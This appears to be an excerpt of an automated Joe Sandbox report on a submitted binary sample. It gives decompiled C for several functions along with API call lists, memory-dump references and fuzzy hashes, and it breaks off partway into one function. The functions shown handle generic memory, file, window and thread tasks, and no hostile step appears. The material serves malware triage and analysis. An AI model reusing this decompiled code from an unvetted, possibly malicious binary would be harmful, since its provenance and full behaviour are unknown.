                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                          • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                                                                                                                                                          • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                                                                                                                                                          • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401618 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401618(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E00401468(0x49e5ec, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                                                                                                                                                          0x0040161c
                                                                                                                                                                                          0x0040161e
                                                                                                                                                                                          0x00401620
                                                                                                                                                                                          0x00401622
                                                                                                                                                                                          0x00401636
                                                                                                                                                                                          0x0040163b
                                                                                                                                                                                          0x0040163d
                                                                                                                                                                                          0x00401641
                                                                                                                                                                                          0x00401649
                                                                                                                                                                                          0x0040164f
                                                                                                                                                                                          0x0040165b
                                                                                                                                                                                          0x00401660
                                                                                                                                                                                          0x00401660
                                                                                                                                                                                          0x00401665
                                                                                                                                                                                          0x0040166e
                                                                                                                                                                                          0x00401675
                                                                                                                                                                                          0x00401681
                                                                                                                                                                                          0x00401688
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401688
                                                                                                                                                                                          0x00401675
                                                                                                                                                                                          0x0040168e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401636
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 0040165B
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401681
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                          • String ID: I
                                                                                                                                                                                          • API String ID: 3668210933-1966777607
                                                                                                                                                                                          • Opcode ID: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                                                                                                                                                          • Instruction ID: d5b131199f8cf9b3caee1c5a15836c0652bc1ac5bd3422d56553b580ad17c722
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DF044B17403206BEB315AAA4CC5F133AD89B45794F154176BE08BF3D9D6B99800866C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409AB8 Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409AB8(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404C30( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                                                                                                                                          0x00409ab9
                                                                                                                                                                                          0x00409abc
                                                                                                                                                                                          0x00409ad8
                                                                                                                                                                                          0x00409acf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409ad1
                                                                                                                                                                                          0x00409ad1
                                                                                                                                                                                          0x00409ad1
                                                                                                                                                                                          0x00409b17
                                                                                                                                                                                          0x00409b1a
                                                                                                                                                                                          0x00409b1a
                                                                                                                                                                                          0x00409ae5
                                                                                                                                                                                          0x00409af4
                                                                                                                                                                                          0x00409afc
                                                                                                                                                                                          0x00409b02
                                                                                                                                                                                          0x00409b10
                                                                                                                                                                                          0x00409b15
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00409AC8
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 00409AD1
                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                          • FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2103556486-0
                                                                                                                                                                                          • Opcode ID: 84f6681039a385418036704490ce2eb2607f9aaaae492207fc2b7d47a4ab7e0b
                                                                                                                                                                                          • Instruction ID: 4a410686d79e47fa2b0968ed75fbe7b0933b14da80f461b342b6a519e83f05d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 84f6681039a385418036704490ce2eb2607f9aaaae492207fc2b7d47a4ab7e0b
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF01DB26042019BCF04DFA9D8C288733ACAB4831431445B7AD16DF28BE638E9549BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00437E5C Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00437E5C(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x49eb2c; // 0x0
					if(GlobalFindAtomA(E00404E80(_t5)) !=  *0x49eb26) {
						_t15 = E00437E28(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x49eb26 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                                                                                                                                                                          0x00437e5c
                                                                                                                                                                                          0x00437e5e
                                                                                                                                                                                          0x00437e5f
                                                                                                                                                                                          0x00437e61
                                                                                                                                                                                          0x00437e65
                                                                                                                                                                                          0x00437e7c
                                                                                                                                                                                          0x00437e93
                                                                                                                                                                                          0x00437eae
                                                                                                                                                                                          0x00437e95
                                                                                                                                                                                          0x00437ea3
                                                                                                                                                                                          0x00437ea3
                                                                                                                                                                                          0x00437e93
                                                                                                                                                                                          0x00437eb5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                          • GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                          • GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2582817389-0
                                                                                                                                                                                          • Opcode ID: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                          • Instruction ID: 314671358fdb4042d771ff6fe008545e316f8929ccac966e84d460348b4874f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF037E2A0C22556D630F7B75C8292B259D8A1C3A6700557BF981E7346D53CFC00C2BE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407A04 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407A04(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                                                                                                                                          0x00407a07
                                                                                                                                                                                          0x00407a0e
                                                                                                                                                                                          0x00407a13
                                                                                                                                                                                          0x00407a19
                                                                                                                                                                                          0x00407a1e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocHandleWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2210401237-0
                                                                                                                                                                                          • Opcode ID: b4c34fbc1b13ea6a858e844dfc3f0a34d9fd416c56990660549c196e3363f7a4
                                                                                                                                                                                          • Instruction ID: 29c6e5d5043a0d7070d9946f6a7af6df8548ecb0a33a5036fe490b322c4e14a4
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4c34fbc1b13ea6a858e844dfc3f0a34d9fd416c56990660549c196e3363f7a4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12B002F4C5820538EA5433B24C0FD3F111C99947093804A6E7840BA2C7987DB846407F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D5A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E0040D5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40d75b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x49dbd4; // 0x407ddc
					E00406A70(_t52,  &_v8);
				} else {
					_t86 =  *0x49de48; // 0x407dd4
					E00406A70(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x49dbfc; // 0x407d7c
					E00406A70(_t60,  &_v372);
					E0040D180(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404C30( &_v340, 0x105,  &_v297);
					E00409E18(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x49dcbc; // 0x407e84
					E00406A70(_t82,  &_v344);
					E0040D180(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040D762);
				E004049C0( &_v372);
				E004049E4( &_v344, 3);
				return E004049C0( &_v8);
			}

































                                                                                                                                                                                          0x0040d5a0
                                                                                                                                                                                          0x0040d5ad
                                                                                                                                                                                          0x0040d5b3
                                                                                                                                                                                          0x0040d5b9
                                                                                                                                                                                          0x0040d5bf
                                                                                                                                                                                          0x0040d5c5
                                                                                                                                                                                          0x0040d5ca
                                                                                                                                                                                          0x0040d5cb
                                                                                                                                                                                          0x0040d5d0
                                                                                                                                                                                          0x0040d5d3
                                                                                                                                                                                          0x0040d5d9
                                                                                                                                                                                          0x0040d5e0
                                                                                                                                                                                          0x0040d5f4
                                                                                                                                                                                          0x0040d5f9
                                                                                                                                                                                          0x0040d5e2
                                                                                                                                                                                          0x0040d5e5
                                                                                                                                                                                          0x0040d5ea
                                                                                                                                                                                          0x0040d5ea
                                                                                                                                                                                          0x0040d5fe
                                                                                                                                                                                          0x0040d60b
                                                                                                                                                                                          0x0040d617
                                                                                                                                                                                          0x0040d6d3
                                                                                                                                                                                          0x0040d6d9
                                                                                                                                                                                          0x0040d6e3
                                                                                                                                                                                          0x0040d6e9
                                                                                                                                                                                          0x0040d6f0
                                                                                                                                                                                          0x0040d6f6
                                                                                                                                                                                          0x0040d70c
                                                                                                                                                                                          0x0040d711
                                                                                                                                                                                          0x0040d723
                                                                                                                                                                                          0x0040d63a
                                                                                                                                                                                          0x0040d63d
                                                                                                                                                                                          0x0040d643
                                                                                                                                                                                          0x0040d65b
                                                                                                                                                                                          0x0040d66c
                                                                                                                                                                                          0x0040d677
                                                                                                                                                                                          0x0040d67d
                                                                                                                                                                                          0x0040d687
                                                                                                                                                                                          0x0040d68d
                                                                                                                                                                                          0x0040d694
                                                                                                                                                                                          0x0040d69a
                                                                                                                                                                                          0x0040d6b0
                                                                                                                                                                                          0x0040d6b5
                                                                                                                                                                                          0x0040d6c7
                                                                                                                                                                                          0x0040d6cc
                                                                                                                                                                                          0x0040d72c
                                                                                                                                                                                          0x0040d72f
                                                                                                                                                                                          0x0040d732
                                                                                                                                                                                          0x0040d73d
                                                                                                                                                                                          0x0040d74d
                                                                                                                                                                                          0x0040d75a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                                                                                                                          • String ID: |}@
                                                                                                                                                                                          • API String ID: 902310565-1323765261
                                                                                                                                                                                          • Opcode ID: 38428d7ec1ac0bb83f62fe106488865421d1ec8f2c2d745158522106af8b37c6
                                                                                                                                                                                          • Instruction ID: 969e10bc4ad112e79de870a84619b0299ea79aa46f8ff725eca5e2ac65c0a227
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38428d7ec1ac0bb83f62fe106488865421d1ec8f2c2d745158522106af8b37c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41410470D00618DFDB21DF65CC81BDAB7B4AB49304F4041FAE508AB291D778AE88CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x45af60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0045ADD8(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0045B3A8(_v8);
					}
				}
				E00458DF8(_t56,  &_v20);
				E004380E0(_v20, 0,  &_v16, _t79);
				_t36 =  *0x49ebb8; // 0x0
				E0045B010(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x45af07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0045AD74();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x49de40; // 0x49e034
				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0045AF67);
				return E004049E4( &_v20, 2);
			}
















                                                                                                                                                                                          0x0045ae50
                                                                                                                                                                                          0x0045ae50
                                                                                                                                                                                          0x0045ae51
                                                                                                                                                                                          0x0045ae53
                                                                                                                                                                                          0x0045ae56
                                                                                                                                                                                          0x0045ae57
                                                                                                                                                                                          0x0045ae58
                                                                                                                                                                                          0x0045ae5b
                                                                                                                                                                                          0x0045ae5e
                                                                                                                                                                                          0x0045ae61
                                                                                                                                                                                          0x0045ae66
                                                                                                                                                                                          0x0045ae67
                                                                                                                                                                                          0x0045ae6c
                                                                                                                                                                                          0x0045ae6f
                                                                                                                                                                                          0x0045ae7a
                                                                                                                                                                                          0x0045ae86
                                                                                                                                                                                          0x0045ae88
                                                                                                                                                                                          0x0045ae8b
                                                                                                                                                                                          0x0045ae8f
                                                                                                                                                                                          0x0045ae94
                                                                                                                                                                                          0x0045ae94
                                                                                                                                                                                          0x0045ae8f
                                                                                                                                                                                          0x0045ae9e
                                                                                                                                                                                          0x0045aea9
                                                                                                                                                                                          0x0045aeb1
                                                                                                                                                                                          0x0045aeb6
                                                                                                                                                                                          0x0045aebb
                                                                                                                                                                                          0x0045aec1
                                                                                                                                                                                          0x0045aec2
                                                                                                                                                                                          0x0045aec7
                                                                                                                                                                                          0x0045aeca
                                                                                                                                                                                          0x0045aed8
                                                                                                                                                                                          0x0045aedd
                                                                                                                                                                                          0x0045aee9
                                                                                                                                                                                          0x0045aee9
                                                                                                                                                                                          0x0045aef3
                                                                                                                                                                                          0x0045aef8
                                                                                                                                                                                          0x0045aef8
                                                                                                                                                                                          0x0045aeff
                                                                                                                                                                                          0x0045af02
                                                                                                                                                                                          0x0045af1c
                                                                                                                                                                                          0x0045af21
                                                                                                                                                                                          0x0045af29
                                                                                                                                                                                          0x0045af36
                                                                                                                                                                                          0x0045af36
                                                                                                                                                                                          0x0045af3e
                                                                                                                                                                                          0x0045af40
                                                                                                                                                                                          0x0045af40
                                                                                                                                                                                          0x0045af47
                                                                                                                                                                                          0x0045af4a
                                                                                                                                                                                          0x0045af4d
                                                                                                                                                                                          0x0045af5f

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                                                                                                                                                          • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentCursorMessageThreadWait
                                                                                                                                                                                          • String ID: 4I
                                                                                                                                                                                          • API String ID: 535285469-2364942553
                                                                                                                                                                                          • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                          • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                          • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040B620(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x40b6fe);
